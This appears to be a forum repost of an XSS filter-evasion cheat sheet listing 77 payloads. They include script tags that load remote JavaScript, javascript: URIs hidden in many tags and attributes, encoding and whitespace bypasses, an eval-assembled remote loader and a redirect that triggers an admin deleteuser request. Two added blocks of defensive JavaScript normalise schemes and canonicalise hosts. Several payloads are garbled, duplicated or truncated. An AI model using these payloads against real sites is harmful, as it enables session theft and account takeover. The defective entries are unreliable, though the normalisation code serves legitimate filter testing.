It seems there is relatively little material on XSS on t00ls, so I'm copying over something good I came across; not sure whether any of you will want to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (must have semicolons)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection; an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters basically have no effect domestically, because there is nowhere to make use of them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) IMG tag with spaces and meta characters in front
<IMG SRC=" javascript:alert('XSS');">
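Items 3 to 19 above all defeat the same defensive mistake: looking for the literal string javascript: in an attribute value before the browser has normalised it (case folding, character-reference decoding, dropping tabs, newlines and null bytes). The following is an added example, not part of the original post or of the cheat sheet it copies; it performs that normalisation first and then allowlists the resulting scheme, and prints how a substring filter and the normalised check disagree. The function names (decodeEntities, extractScheme, isSafeUrl, naiveIsSafe) and the sample values are constructed for this illustration.

```javascript
// Added defensive example, not from the original post: normalise a URL-typed
// attribute value the way a browser does before deciding what scheme it has.
// Function names and sample inputs are constructed for this illustration.

// Small named-entity table; numeric references are handled generically.
const NAMED_ENTITIES = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'",
  colon: ':', tab: '\t', newline: '\n' };

// Decode HTML character references. The trailing semicolon is optional, which
// is exactly what the "no semicolon" encodings in items 9 and 10 rely on.
function decodeEntities(value) {
  return value.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (whole, body) => {
    if (body[0] === '#') {
      const isHex = body[1].toLowerCase() === 'x';
      const cp = parseInt(isHex ? body.slice(2) : body.slice(1), isHex ? 16 : 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
    }
    const named = NAMED_ENTITIES[body.toLowerCase()];
    return named === undefined ? whole : named;
  });
}

// Browsers drop tab, newline and carriage return anywhere in a URL and ignore
// leading control characters; the null-byte, tab and newline variants above
// rely on exactly that. Stripping every control character and space before
// reading the scheme is deliberately stricter than the browser.
function extractScheme(rawValue) {
  const stripped = decodeEntities(rawValue).replace(/[\u0000-\u0020\u007f]/g, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(stripped);
  return m ? m[1].toLowerCase() : null; // null: relative URL, no scheme at all
}

const SAFE_SCHEMES = new Set(['http', 'https', 'mailto']);

// True when the value is safe to emit into href/src: either scheme-less
// (relative) or one of the allowlisted schemes.
function isSafeUrl(rawValue) {
  const scheme = extractScheme(rawValue);
  return scheme === null || SAFE_SCHEMES.has(scheme);
}

// The substring check this cheat sheet is written to defeat, for comparison.
function naiveIsSafe(rawValue) {
  return !rawValue.includes('javascript:');
}

// Constructed samples mirroring the variants listed above.
const SAMPLES = [
  'javascript:alert(1)',                                       // item 3
  'JaVaScRiPt:alert(1)',                                       // item 4
  '&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)', // item 5
  'jav\tascript:alert(1)',                                     // item 11
  'jav&#x09;ascript:alert(1)',                                 // item 12
  'jav\nascript:alert(1)',                                     // item 13
  'java\u0000script:alert(1)',                                 // item 17
  ' javascript:alert(1)',                                      // item 19
  'javascript&colon;alert(1)',                                 // named entity
  'vbscript:msgbox(1)',                                        // item 40
  'https://example.invalid/a.png',
  '/images/logo.png',
];

for (const value of SAMPLES) {
  console.log(JSON.stringify(value), 'naive:', naiveIsSafe(value), 'normalised:', isSafeUrl(value));
}
```

The check belongs at the point where an attribute value is emitted into href, src, background and similar URL-typed attributes; relative URLs pass, and anything with an unknown scheme (vbscript: included) is rejected rather than blocklisted.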
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

(41) META link url
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made up of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) Using ActionScript inside Flash you can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>

(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
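Items 70 to 76 show that one host can be spelled as a decimal integer, hex or octal components, a mixed-radix string, or a name with a trailing dot, so a link or redirect allowlist that compares raw strings misses every one of them. The following is an added example, not part of the original post or of the cheat sheet it copies: a canonicaliser that applies the legacy inet_aton spelling rules (decimal, hex, octal, fewer than four components, trailing dot) and folds names to a comparable form before the allowlist lookup. The function names (parseIpPart, legacyIpv4ToDotted, canonicalHost, hostIsAllowed), the allowlist and the sample inputs are constructed for this illustration; a WHATWG-compliant URL parser such as Node's URL class performs the same IPv4 normalisation, which is the reason to compare new URL(u).hostname rather than regex-match the raw string.

```javascript
// Added defensive example, not from the original post: canonicalise a host
// before comparing it with an allowlist. Implements the legacy inet_aton
// spelling rules (decimal, hex, octal, fewer than four parts) that browsers
// still accept, plus the trailing-dot form. Names and inputs are constructed.

// One dotted component: "0x.." is hex, a leading zero means octal, otherwise
// decimal. A leading zero followed by an 8 or 9 is not a valid number.
function parseIpPart(part) {
  if (/^0[xX][0-9a-fA-F]*$/.test(part)) return part.length === 2 ? 0 : parseInt(part.slice(2), 16);
  if (/^0[0-9]+$/.test(part)) return /^0[0-7]+$/.test(part) ? parseInt(part, 8) : NaN;
  if (/^[0-9]+$/.test(part)) return parseInt(part, 10);
  return NaN;
}

// Returns "a.b.c.d" when `host` is a numeric IPv4 in any legacy spelling,
// or null when it is not a numeric address at all.
function legacyIpv4ToDotted(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop(); // "1.2.3.4."
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = parts.map(parseIpPart);
  if (nums.some(Number.isNaN)) return null;
  // Every part but the last must fit in one byte; the last part fills all the
  // remaining bytes, which is why "0xc0a80001" and "192.168.1" are valid.
  const head = nums.slice(0, -1);
  const last = nums[nums.length - 1];
  if (head.some((n) => n > 255)) return null;
  const remainingBytes = 4 - head.length;
  if (last >= 256 ** remainingBytes) return null;
  const value = head.reduce((acc, n) => acc * 256 + n, 0) * 256 ** remainingBytes + last;
  return [24, 16, 8, 0].map((shift) => Math.floor(value / 2 ** shift) % 256).join('.');
}

// Canonical form for allowlist comparisons: numeric hosts become a dotted
// quad; names are lower-cased with any absolute-DNS trailing dot removed.
function canonicalHost(host) {
  const ip = legacyIpv4ToDotted(host);
  return ip !== null ? ip : host.toLowerCase().replace(/\.$/, '');
}

// Does `host`, however it is spelled, name something on the allowlist?
function hostIsAllowed(host, allowlist) {
  return allowlist.has(canonicalHost(host));
}

// Constructed allowlist, checked against the spellings from items 70 to 76.
const ALLOWED = new Set(['192.168.0.1', 'www.google.com']);
for (const h of ['3232235521', '0xc0.0xa8.0x00.0x01', '0300.0250.0000.0001',
                 '66.000146.0x7.147', 'www.google.com.', 'WWW.GOOGLE.COM']) {
  console.log(h.padEnd(22), '->', canonicalHost(h).padEnd(15), hostIsAllowed(h, ALLOWED));
}
```

The mixed-radix host from item 73, once the embedded whitespace is gone, resolves to 66.102.7.147 under these rules; the octal component 000146 is 102 decimal, not 146, which is the kind of mismatch a string comparison never sees.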